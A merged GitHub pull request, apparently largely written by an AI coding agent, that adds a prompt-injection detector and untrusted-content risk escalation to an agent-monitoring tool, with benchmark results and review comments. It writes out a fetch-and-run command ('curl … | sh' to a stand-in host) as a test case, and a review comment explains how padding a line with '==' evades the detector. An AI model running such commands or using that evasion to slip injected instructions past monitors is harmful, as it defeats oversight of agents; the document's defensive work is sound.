Skip to content

Guard: prompt injection is a detector, and untrusted content raises the pre-tool risk tier - #5962

Merged
vivekchand merged 11 commits into
mainfrom
feat/guard-prompt-injection-detector
Sep 15, 2026
Merged

vivekchand merged 11 commits into
mainfrom
feat/guard-prompt-injection-detector

Conversation

@vivekchand

Copy link
Copy Markdown
Owner

Stacked on #5952; merge that first.

Refs #5945

Product record: https://factory.8090.ai/project/b415065f-ab2f-4f53-8864-0c009fd098cb/requirements/e87935d1-27e0-415f-a5f8-24bdf70accbc
Blueprint: https://factory.8090.ai/project/b415065f-ab2f-4f53-8864-0c009fd098cb/blueprints/377d7454-a63b-42eb-b598-c25f0d75620f (child of the Guard blueprint 8a92d41f, which now lists the content detector)

Why

Before this change, prompt-injection detection was phrase matching in the Security tab scan and an evaluator card. Neither was a Guard finding, so no policy could act on it. The pre-tool gate rated a call only by what the call itself does, so it could not tell curl … | sh typed by the operator from curl … | sh issued right after the agent read a page telling it to.

What

1. prompt_injection is a Guard detector (clawmetry/detector_injection.py, signatures in clawmetry/prompt_injection.py, registered in clawmetry/detectors.py).

  • It reads the text of tool results and user-sourced messages. Every other detector reads the shape of the tool stream or the call arguments.
  • Six declared, bounded signatures: override_instructions, new_instructions, forged_authority, task_handoff, conceal_from_user, role_hijack.
  • Severity:
    • warning: a tool result matched;
    • info: only a user message matched;
    • critical: a tool call rated high or critical followed the match before the next user prompt.
  • The finding names the signature ids, their plain labels and the tool. It never repeats the matched text.
  • Not scanned: runtime-injected context (AGENTS.md, system reminders), and signature text quoted as code or a regex.
  • Policies can select it by trigger_kind, and an "any signal" policy matches it like any other detector kind.
  • Framework references: LLM01:2026, ASI01, AML.T0051.000 (Direct) and AML.T0051.001 (Indirect). The mapping version is now 2026-09-14.2, and --verify-atlas passes against ATLAS 2026.08.
  • The Guard tab, alerts feed and incident email have plain-words labels for it.

2. Untrusted content raises the Claude Code pre-tool risk tier (following MITRE ATLAS AML.M0030).

  • How the context gets to the gate:
    • clawmetry/claude_code_gate.py: the hook process reads the last 1 MiB of the transcript named in the hook payload. It adds untrusted_context with tool names, a count and signature ids for the current turn, and never content.
    • routes/hooks.py: the receiver drops unknown keys, malformed tool names and signature ids it does not declare.
    • clawmetry/approvals.py: match_policy applies the context whenever a rule has min_risk.
  • Untrusted sources: web fetch and search, browser, MCP servers, mail and chat tools, and shell commands that start with curl, wget, gh issue|pr view or gh api. Local reads and test output are not untrusted.
  • Rating rule:
    • a high call after untrusted output becomes critical;
    • a medium-or-above call after content that matched a signature becomes critical;
    • low calls, and medium calls with no signature match, are unchanged;
    • no context means today's rating, and a missing context never blocks a call.
  • The approval row's _cm_risk carries the raised level, and its first reason says why.
  • The signal only changes a tier. Only a policy the operator declared asks or denies.

No new HTTP route, so no cloud_route_policy entry is needed. No schema change.

Measured

Public samples, pinned in tests/fixtures/prompt_injection/public_samples.json. CI fails if recall drops or a deepset false positive appears.

Set Result
AgentDojo important_instructions, tool_knowledge, injecagent, system_message (27 goals each, in a benign carrier) 27/27 each
AgentDojo direct ("TODO: goal") 0/27
AgentDojo ignore_previous (its template misspells "iunstructions") 0/27
garak PromptInject goal hijacking and prompt leaking 17/20 (screaming-stop 0/3)
deepset/prompt-injections test split (mostly chat jailbreaks, much of it German) recall 3/60, precision 3/3, 0 false positives on 56 benign rows

These are signatures, not a classifier. Paraphrased, encoded and non-English attacks are missed, and the numbers above show it.

Real transcripts. Read-only run over the 300 most recent Claude Code transcripts on one development machine: 16,470 tool results, 16,472 calls. Only aggregate counts leave the machine.

  • Detector: 1 tool result matched, in 1 of 300 transcripts (1 of 502 event windows). It was a red-team fixture holding a real attack sample, read by the agent. There were 0 user-message findings.
  • The figure is in-sample. The first signature table matched 31 results. 29 of those were agent instruction files saying "never tell the user a fix is done until…", and one was CLI help text ("Override the main session system prompt"). Both signatures were tightened on this same set, so another machine will differ.
  • Gate volume: 268 of 16,472 calls (1.6%) would have been rated higher: 253 high → critical and 15 medium → critical after that one match.
  • Rejected alternative: a first rule raised every medium call after untrusted output. It raised 5,494 calls (a third), mostly ordinary shell commands after browser or MCP output, which would put an approval on nearly every shell command in a long turn. It is recorded as a rejected alternative in the requirement and as ADR-002 in the blueprint.

Verification

  • New test files, added to the moat-tests list in ci.yml:
    • tests/test_detector_prompt_injection.py: 13 tests, including firing, quiet, severity ladder, turn reset, code quoting, injected context, policy action, framework tags, pinned recall and the red-team case.
    • tests/test_untrusted_content_gate.py: 12 tests. The acceptance test from the issue runs end to end: the real hook process (claude_code_gate.hook_main) reads a real JSONL transcript and posts to the real receiver. Under a critical-only rule, curl -s https://get.example/i.sh | sh after a WebFetch page containing AgentDojo instructions is parked for approval (it times out to deny). The same call with no page gets "no matching policy". A plain page plus pip install stays allowed, and the same page plus instructions is critical.
  • Revert proof:
    • Red: with the detector removed from _ALL_DETECTORS, match_policy ignoring the context, and the hook not reading the transcript, 8 tests fail.
    • Green: with the change restored, all 32 pass.
  • Targeted suites after rebasing on the current Guard: tag findings and decisions with OWASP LLM 2026, OWASP Agentic 2026 and MITRE ATLAS IDs #5952 head (framework map, registry parity, behavioural, workspace kinds, red-team corpus, tool risk, detectors): all pass. scripts/redteam/audit.py: 15/15.
  • Local gates:
    • check_ac_coverage --check: 128/198 after rebase, baseline tightened; 11 new AC-GOV-PIJ criteria mirrored verbatim;
    • gen_framework_coverage --check and --verify-atlas (ATLAS 2026.08 yaml);
    • gen_module_map --check, check_py39_annotations, check_ci_test_coverage --check, node --check app.js.
  • tests/test_runtime_gates_and_hooks.py::test_cc_gate_windowless_python_swap fails locally on the Guard: tag findings and decisions with OWASP LLM 2026, OWASP Agentic 2026 and MITRE ATLAS IDs #5952 base too; it is unrelated to this change.

Not verified / remaining

  • Transcript timing: I did not run a live Claude Code turn. What is unverified is whether the previous tool result is already in the transcript file when the next PreToolUse hook fires. The tests use real transcript shapes, and an existing file shows each tool result written before the next tool_use entry. If the result is not yet flushed, the gate gets no context, which is today's rating and never a block.
  • Other gates: Cursor and Copilot gates, and the older clawmetry hooks run pretooluse cloud path, keep today's rating.
  • Security tab: the scan (/api/security/policy-events) still uses its own older patterns; unifying it is later work.
  • Hosted dashboard: findings ride the existing loop_signals and Guard session payloads, so no new surface was added. I did not walk the hosted dashboard for this kind.

🤖 Generated with Claude Code

https://claude.ai/code/session_01Jm9d7s4fN55hN3YzQo75o9

@8090-software-factory

Copy link
Copy Markdown

✅ Drift Bot (ClawMetry): no drift detected

Drift Bot analyzed the changed files against this project's blueprints and requirements and found no drift.

@github-actions

github-actions Bot commented Sep 14, 2026 •

Copy link
Copy Markdown
Contributor

Visual diff

Bot run failed before producing screenshots. Check the workflow logs.

This check is non-blocking.

@vivekchand

Copy link
Copy Markdown
Owner Author

Coordinator review

Verdict: ready to merge once CI is green and #5952 has merged. No blocking findings.

Reviewed head ae6620d723. It is rebased on the current #5952 head (bc9e9f97).

What I checked myself

  • Targeted tests pass. 46 passed across the new detector tests, the gate tests, registry parity and the framework map, run in a scratch HOME. check_ac_coverage --check reports 128/198 with the ratchet holding.
  • Real stored event shapes work. I ran a transcript through the Pro Claude Code parser (claude_jsonl.transcript_events) and the same row conversion the daemon uses (data.content, role tool).
    • An injected WebFetch page is a warning that names the signatures and the tool.
    • curl … | sh after that page is critical.
    • The finding keeps no matched text.
  • Quiet on real sessions. Over 60 recent real Claude Code sessions there were 0 prompt_injection findings. The new detector adds a few milliseconds per session, and the hook's transcript read takes about 2 ms, even on a 60 MB transcript.
  • Transcript timing, one sample. The builder listed this as unverified. From inside a live Claude Code session, the previous call's tool_result entry was already in the transcript file when the next tool call ran. That is supporting evidence, not a PreToolUse measurement.
  • FLYWHEEL gates.
    • The full Factory URL is in the PR body.
    • The new tests are added to ci.yml.
    • No check is weakened; the AC baseline only goes up.
    • There is no new HTTP route, so no cloud route-policy entry is needed.
    • No customer or deal names appear. "Emma Johnson" is AgentDojo's own sample text.
  • Payload privacy. The hook sends only tool names, counts and signature ids. The receiver drops malformed values, and a test asserts that no content reaches it.

Not blocking, but worth a follow-up issue

  1. Easy evasion through the code-line exemption. A match is skipped when its line contains ==, !=, \s, ${, [^, => or def . That includes a whole single-line JSON result.
    • An attacker only has to put a == b on the same line as the instruction. A JSON result with base64 == padding anywhere also hides a match.
    • Measured: 0 hits on a one-line JSON body with "etag":"dGVzdA==", and on a body that contains !=.
    • Accidental misses are rare: 3 of 869 real untrusted results (browser, MCP, web) with the attack embedded.
    • The framework limit says only "an attack written as code is missed". It should say that any line with these markers is skipped. A better fix is to exempt only when the whole result looks like code.
  2. The detector scans local reads, not just untrusted output. Opening this repo's own tests/fixtures/prompt_injection/public_samples.json or scripts/redteam/corpus/* raises a warning. In the gate, any medium-or-above call later in that turn becomes critical. This is the one in-sample hit already disclosed. It only matters for people working on ClawMetry itself.
  3. A user text block can reset the turn. In the detector, any role-user message event ends the turn, including a text block that shares a transcript entry with tool results. The critical rung can therefore be missed after such an entry.
  4. Untrusted volume is mostly browser output. Browser MCP results were 688 of 869 untrusted results. Under a critical-only rule, most of the 253 calls raised from high to critical will follow browser reads. This is disclosed, and worth watching after release.
  5. Merge order.
    • At review time: 21 checks passed, 15 were pending, none failed, and the PR was mergeable (UNSTABLE only because checks were pending).
    • Guard: tag findings and decisions with OWASP LLM 2026, OWASP Agentic 2026 and MITRE ATLAS IDs #5952 must merge first. Then retarget this PR to main so the full matrix runs.
    • The remaining items in the PR body (Cursor and Copilot gates, the Security tab patterns, the hosted dashboard walk) are listed honestly. The cloud repo has no kind-label map, so nothing there renders a raw id.

🤖 Generated with Claude Code

https://claude.ai/code/session_01Jm9d7s4fN55hN3YzQo75o9

@8090-software-factory

Copy link
Copy Markdown

✅ Drift Bot (ClawMetry): no drift detected

Drift Bot analyzed the changed files against this project's blueprints and requirements and found no drift.

@vivekchand

Copy link
Copy Markdown
Owner Author

MOAT Verifier failure on ae6620d723: root cause and fix (dc7d8cd280)

The 3 end-to-end tests in tests/test_untrusted_content_gate.py pass alone but failed in the MOAT Verifier run. The gate answered approval store unavailable — fail-open where it should have parked the call and denied it on timeout.

Cause. Other tests left process-global state behind, found by bisecting the MOAT file list:

  • tests/test_cli_unattended_update.py::test_real_parser_wires_unattended_into_cmd_update runs the real cli.main(), which sets os.environ["CLAWMETRY_ROLE"] = "dashboard" and never unsets it. From then on local_store.get_store() returns a read-only _ProxyStore, so routes/hooks.py::_ls_write returns False and the approval row is never written.
  • tests/test_dives_questions.py installed a MagicMock flask whenever flask had not been imported yet, not only when it was missing. In some orders a later from flask import Flask gets the mock.

Fix in dc7d8cd280 (test files only; no assertion changed):

  • The leaking cli test registers CLAWMETRY_ROLE with monkeypatch, so it is restored at teardown.
  • The dives test mocks flask only on ImportError.
  • The gate fixture clears CLAWMETRY_ROLE itself, so it holds in any order.

05a83cc206 alone does not fix this. It patches local_store_call_via_daemon in _no_daemon_proxy. I checked out that head without my commit and ran test_cli_unattended_update.py followed by test_untrusted_content_gate.py: the same 3 tests still fail. The leaked env var changes what get_store() returns, which that patch does not reach. Both commits are kept on the branch.

Verified locally

Run Before After
test_cli_unattended_update.py then gate tests 3 failed 28 passed
test_dives_questions.py then gate tests 1 failed 92 passed
Gate tests with CLAWMETRY_ROLE=dashboard exported — 12 passed
MOAT file list, files 1–115 in CI order, plus gate tests 3 gate failures 0 gate failures

The MOAT list run still shows 4 failures that also failed before this fix and passed in CI: test_moat_perf_benchmark and three test_openclaw_detection_real cases. They come from this machine, which has a real OpenClaw install and is under load. test_cc_gate_windowless_python_swap also fails locally before and after both commits; it passed in CI.

🤖 Generated with Claude Code

https://claude.ai/code/session_01Jm9d7s4fN55hN3YzQo75o9

@8090-software-factory

Copy link
Copy Markdown

✅ Drift Bot (ClawMetry): no drift detected

Drift Bot analyzed the changed files against this project's blueprints and requirements and found no drift.

@vivekchand

Copy link
Copy Markdown
Owner Author

Ready to merge (after #5952)

This PR is ready: CI green on dc7d8cd280 (36 passed, OpenSSF Scorecard skipped), drift-bot and the product-record gate passed, mergeable=MERGEABLE, mergeStateStatus=CLEAN. The review had no blocking findings. The MOAT Verifier failure is fixed; the comment above has the root cause.

Blocked on #5952, which is still red. Its Syntax & Lint fails at "Module map matches the source tree" because docs/MODULE_MAP.md is out of date, and E2E Gate (required) fails with it. The fix on that branch is python3 scripts/gen_module_map.py and a commit.

Merge order

  1. Fix Guard: tag findings and decisions with OWASP LLM 2026, OWASP Agentic 2026 and MITRE ATLAS IDs #5952's module map, get it green, merge it.
  2. Retarget this PR to main if GitHub has not done it, and let the full matrix run. This PR is stacked, so its green run was against feat/guard-framework-ids, not main. Rerun any job queue-priority cancels.
  3. Merge this PR.

Companion PRs: #5952 (framework IDs; this PR adds the prompt_injection entry and mapping version 2026-09-14.2). No cloud route-policy PR: no new HTTP route.

Verify after merge

  • python3 scripts/gen_framework_coverage.py --check --verify-atlas, python3 scripts/check_ac_coverage.py --check and python3 scripts/gen_module_map.py --check all pass on main.
  • MOAT Verifier on main includes tests/test_detector_prompt_injection.py and tests/test_untrusted_content_gate.py, and both pass.

Verify after release (scratch HOME and venv, never the real daemon)

  1. pip install clawmetry==<release> then python3 -c "import clawmetry.detectors as d; print('prompt_injection' in {n for n, *_ in d.DETECTORS} if hasattr(d, 'DETECTORS') else d)", or check the registry the same way tests/test_detector_prompt_injection.py does; prompt_injection must be registered.
  2. Write a Claude Code policy tool: exec, min_risk: critical, action: require_approval, run the hook with a transcript whose last tool result is the INSTRUCTIONS_PAGE sample from tests/test_untrusted_content_gate.py, then send curl -s https://get.example/i.sh | sh. A pending row must appear in /api/approvals. The same call with no fetched page must be allowed with "no matching policy".
  3. Confirm the hook payload carries only untrusted_tools, untrusted_results, injection_signatures, injection_tools, never tool output.
  4. On a live Claude Code turn, confirm the previous tool result is already in the transcript when the next PreToolUse hook fires. This is still unverified. If it is not there, the gate gets no context and keeps today's rating; it never blocks.
  5. Watch approval volume for a week after release: on real transcripts about 1.6% of calls would be rated higher, mostly after browser MCP reads.

🤖 Generated with Claude Code

https://claude.ai/code/session_01Jm9d7s4fN55hN3YzQo75o9

@vivekchand
vivekchand force-pushed the feat/guard-prompt-injection-detector branch from dc7d8cd to a3aa485 Compare September 14, 2026 03:20
@8090-software-factory

Copy link
Copy Markdown

✅ Drift Bot (ClawMetry): no drift detected

Drift Bot analyzed the changed files against this project's blueprints and requirements and found no drift.

github-actions Bot pushed a commit that referenced this pull request Sep 14, 2026
@8090-software-factory

Copy link
Copy Markdown

✅ Drift Bot (ClawMetry): no drift detected

Drift Bot analyzed the changed files against this project's blueprints and requirements and found no drift.

@vivekchand
vivekchand force-pushed the feat/guard-framework-ids branch from 9466e76 to ae93e0f Compare September 14, 2026 03:46
github-actions Bot pushed a commit that referenced this pull request Sep 14, 2026

Copy link
Copy Markdown
Owner Author

Merged origin/main into this branch. Resolved a mechanical CHANGELOG.md conflict: kept both the PR's prompt injection and framework-IDs entries and main's Copilot VS Code fix entry in the Unreleased section.


Generated by Claude Code

@8090-software-factory

Copy link
Copy Markdown

✅ Drift Bot (ClawMetry): no drift detected

Drift Bot analyzed the changed files against this project's blueprints and requirements and found no drift.

Copy link
Copy Markdown
Owner Author

awaiting confirmation — non-trivial rebase, needs human review (conflicts in: stacked on feat/guard-framework-ids (#5952), base branch is not main; cannot safely rebase to main without first landing or rebasing the parent PR)


Generated by Claude Code

@8090-software-factory

Copy link
Copy Markdown

✅ Drift Bot (ClawMetry): no drift detected

Drift Bot analyzed the changed files against this project's blueprints and requirements and found no drift.

1 similar comment
@8090-software-factory

Copy link
Copy Markdown

✅ Drift Bot (ClawMetry): no drift detected

Drift Bot analyzed the changed files against this project's blueprints and requirements and found no drift.

@vivekchand
vivekchand changed the base branch from feat/guard-framework-ids to main September 14, 2026 06:54
@8090-software-factory

Copy link
Copy Markdown

✅ Drift Bot (ClawMetry): no drift detected

Drift Bot analyzed the changed files against this project's blueprints and requirements and found no drift.

1 similar comment
@8090-software-factory

Copy link
Copy Markdown

✅ Drift Bot (ClawMetry): no drift detected

Drift Bot analyzed the changed files against this project's blueprints and requirements and found no drift.

github-actions Bot pushed a commit that referenced this pull request Sep 14, 2026

Copy link
Copy Markdown
Owner Author

E2E Gate timed out — runner queue backup, not a code failure.

The gate's own log explains it:

FAIL: timed out after 3600s. Still pending:
  - MOAT Keystone: 0/1 leg(s) complete
  - E2E Browser Tests: 0/1 leg(s) complete
  - API Tests (3 OS): 0/3 leg(s) complete
  - MOAT Verifier: 0/1 leg(s) complete
  - Entitlement API tests: 0/1 leg(s) complete
  - pip install matrix: 0/4 leg(s) complete
  - Wheel install & assets: 0/1 leg(s) complete
  - Store invariants: 0/1 leg(s) complete

A check stuck at 'not reported' usually means its workflow did not run
for this commit -- confirm it triggers on pull_request without a paths filter.

All of those checks were queued but never picked up by a runner within the 1-hour window — none of the test bodies ran. The CI workflow auto-re-triggered (attempt 2, started 08:18:54 UTC) and Syntax & Lint passed again at 08:28:41 UTC with all downstream tests re-queued. Re-running the E2E Gate now so it can pick up the attempt-2 results.


Generated by Claude Code

@8090-software-factory

Copy link
Copy Markdown

✅ Drift Bot (ClawMetry): no drift detected

Drift Bot analyzed the changed files against this project's blueprints and requirements and found no drift.

github-actions Bot pushed a commit that referenced this pull request Sep 14, 2026
@vivekchand
vivekchand force-pushed the feat/guard-prompt-injection-detector branch from 44d6eab to 9b45595 Compare September 14, 2026 12:35

Copy link
Copy Markdown
Owner Author

⚠️ needs manual rebase — conflict in CLAUDE.md, clawmetry/detectors.py, clawmetry/framework_map.py, clawmetry/static/js/app.js, docs/MODULE_MAP.md (and others). Cannot auto-resolve: changes to core detection modules require code-level judgment.


Generated by Claude Code

Copy link
Copy Markdown
Owner Author

Blocked on required review — skipping (auto-mergeability sweep). Also stacked on #5952; merge that first. @vivekchand please approve when ready.


Generated by Claude Code

github-actions Bot pushed a commit that referenced this pull request Sep 14, 2026
@8090-software-factory

Copy link
Copy Markdown

✅ Drift Bot (ClawMetry): no drift detected

Drift Bot analyzed the changed files against this project's blueprints and requirements and found no drift.

2 similar comments
@8090-software-factory

Copy link
Copy Markdown

✅ Drift Bot (ClawMetry): no drift detected

Drift Bot analyzed the changed files against this project's blueprints and requirements and found no drift.

@8090-software-factory

Copy link
Copy Markdown

✅ Drift Bot (ClawMetry): no drift detected

Drift Bot analyzed the changed files against this project's blueprints and requirements and found no drift.

Copy link
Copy Markdown
Owner Author

E2E Gate failure — infrastructure hang, not a code issue

The E2E Gate (required) check timed out after 3600s because the Entitlement API tests job (run 34917906534, job 104223297944) started at 02:36 UTC and never completed — it is still showing in_progress now, 12+ minutes after starting. All other 11 required checks passed cleanly.

This is a runner/infrastructure hang. The diff does not touch the entitlement test suite or its dependencies. I cannot re-run the stuck job from here (no direct rerun API access). The E2E Gate will need to be re-triggered once the runner clears — a push or a manual re-run of the gate workflow will bring this back to green.


Generated by Claude Code

Copy link
Copy Markdown
Owner Author

Skipping — stacked on #5952 which hasn't merged yet; this PR won't be mergeable until its base is in main. No action from the auto-mergeability sweep.


Generated by Claude Code

vivekchand and others added 11 commits September 15, 2026 03:41
…2026 and MITRE ATLAS IDs

One versioned mapping contract (clawmetry/framework_map.py) from every Guard
finding kind to verified framework identifiers, with edition, rationale,
limits and a firing and a quiet test per mapped kind, and an explicit none
with a reason where no identifier applies. Findings carry the references
(mode detect, no pre-action control); policy decisions carry them plus an
evidence level (configured, exercised or failed; never effective).
docs/FRAMEWORK_COVERAGE.md is generated from the contract and CI fails on
drift.

Refs #5943. Factory requirement 15504aea-9ca0-4a1a-a23d-8e825e4f78f9.

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01Jm9d7s4fN55hN3YzQo75o9
…_map.py)

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01LC3LtX5cKCVfq55bqRxzAY
…he pre-tool risk tier

prompt_injection (clawmetry/detector_injection.py, signatures in
clawmetry/prompt_injection.py) reads the text of tool results and
user-sourced messages. Tool-result match is a warning, a user message alone
is info, and a high-risk call after the match in the same turn is critical.
The finding never repeats the matched text. Mapped to LLM01:2026, ASI01,
AML.T0051.000 and AML.T0051.001 (mapping version 2026-09-14.2).

The Claude Code hook reads the transcript tail it runs beside and sends
tool names, a count and signature ids for the current turn (never content).
After ATLAS AML.M0030, a high-risk call after untrusted output is rated
critical, and a medium-or-above call after a signature match is critical.
No context means today's rating.

Measured: AgentDojo important_instructions, tool_knowledge, injecagent,
system_message 27/27 each, direct and ignore_previous 0/27; garak
PromptInject 17/20; deepset test split 3/60 at precision 3/3. On 300 real
transcripts (in-sample): 1 of 16,470 tool results matched, 268 of 16,472
calls rated higher.

Refs #5945

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01Jm9d7s4fN55hN3YzQo75o9
… isolation

The gate tests (test_untrusted_content_gate.py) fail in CI when preceded
by 2760 other tests because _ls_write calls local_store_call_via_daemon
(not local_store_via_daemon), so the write path was not patched to bypass
daemon discovery. If a stale _cached_discovery from a prior test pointed
at a daemon that no longer answers, _ls_write could return True without
actually writing to the test store, or check_session_allow could find a
stale "allow" from session_id "s-pij" in a prior test's store.

Patching both functions ensures every read and write in gate tests uses
the fresh in-process DuckDB store, eliminating the pollution vector.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_0154SEoKpixxxoFgQNvd3rgJ
…t gate tests in CI order

MOAT Verifier failed 3 tests in tests/test_untrusted_content_gate.py that pass
alone. Bisected to two earlier test files that leak global state:

- test_cli_unattended_update.py runs the real cli.main(), which sets
  os.environ["CLAWMETRY_ROLE"] = "dashboard" and never unsets it. Every later
  local_store.get_store() then returns a read-only _ProxyStore, the approval
  row is never written, and the gate answers "approval store unavailable -
  fail-open" instead of asking. Scope the variable with monkeypatch.
- test_dives_questions.py installed a MagicMock flask whenever flask was not
  yet imported (not only when missing), so a later `from flask import Flask`
  got a mock. Mock only on ImportError.

The gate fixture also clears CLAWMETRY_ROLE itself, so it holds in any order.
No assertion changed.

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01Jm9d7s4fN55hN3YzQo75o9
Module map drifted after new modules were added on this branch.
Regenerated with scripts/gen_module_map.py.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01BmRoobgusxAb1DGHhBhbNF
…2026 and MITRE ATLAS IDs

One versioned mapping contract (clawmetry/framework_map.py) from every Guard
finding kind to verified framework identifiers, with edition, rationale,
limits and a firing and a quiet test per mapped kind, and an explicit none
with a reason where no identifier applies. Findings carry the references
(mode detect, no pre-action control); policy decisions carry them plus an
evidence level (configured, exercised or failed; never effective).
docs/FRAMEWORK_COVERAGE.md is generated from the contract and CI fails on
drift.

Refs #5943. Factory requirement 15504aea-9ca0-4a1a-a23d-8e825e4f78f9.

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01Jm9d7s4fN55hN3YzQo75o9
…_map.py)

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01LC3LtX5cKCVfq55bqRxzAY
Module map drifted after new modules were added on this branch.
Regenerated with scripts/gen_module_map.py.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01BmRoobgusxAb1DGHhBhbNF
The CHANGELOG entry moves to the release commit. MODULE_MAP counted 256
modules; with detector_injection and prompt_injection it is 258.

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01Jm9d7s4fN55hN3YzQo75o9
@vivekchand
vivekchand force-pushed the feat/guard-prompt-injection-detector branch from 27d70fc to 2126b15 Compare September 15, 2026 03:43
@8090-software-factory

Copy link
Copy Markdown

✅ Drift Bot (ClawMetry): no drift detected

Drift Bot analyzed the changed files against this project's blueprints and requirements and found no drift.

@vivekchand
vivekchand merged commit 0af3a8d into main Sep 15, 2026
43 of 45 checks passed
vivekchand pushed a commit that referenced this pull request Sep 15, 2026
…ULE_MAP

Brings in Guard prompt injection detector (#5962) merged to main.
Regenerates docs/MODULE_MAP.md: 260 -> 267 modules, 83 -> 84 blueprints.
Re-triggers full CI suite.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01Jgaf95Zzshc3FUBzqNRxiT
vivekchand pushed a commit that referenced this pull request Sep 15, 2026
Brings in Guard prompt injection detector (#5962) and project
attribution budgets (#5968 merge base update). Regenerates
docs/MODULE_MAP.md; re-triggers full CI.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01Jgaf95Zzshc3FUBzqNRxiT
vivekchand pushed a commit that referenced this pull request Sep 15, 2026
…map/AC conflicts

- Include both content (prompt injection, from main/#5962) and workspace
  (extended for agent config dirs, from this branch) in FAMILY_SOURCES
- Include both AC-GOV-SCI-* (supply chain, this branch) and
  AC-GOV-PIJ-* (prompt injection, main/#5962) in acceptance_criteria.json
- Regenerate docs/MODULE_MAP.md and docs/FRAMEWORK_COVERAGE.md

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01Jgaf95Zzshc3FUBzqNRxiT
vivekchand added a commit that referenced this pull request Sep 15, 2026
Publishes #5962 (prompt injection as a Guard detector with untrusted-content
pre-tool escalation) and #5968 (spend per project and per-project budgets),
with their CHANGELOG entries.

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01Jm9d7s4fN55hN3YzQo75o9
vivekchand added a commit that referenced this pull request Sep 15, 2026
Publishes #5962 (prompt injection as a Guard detector with untrusted-content
pre-tool escalation) and #5968 (spend per project and per-project budgets),
with their CHANGELOG entries.

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01Jm9d7s4fN55hN3YzQo75o9
vivekchand added a commit that referenced this pull request Sep 15, 2026
…r-project spend and budgets (#6018)

Releases prompt_injection Guard detector, untrusted-content escalation in Claude Code pre-tool gate, per-project spend tracking, per-project budgets with 50/80/100% alerts, and per-project CSV export.

Carries #5962 and #5968.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01VWWP5sYH4qEGaqcsvqhVQ6
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants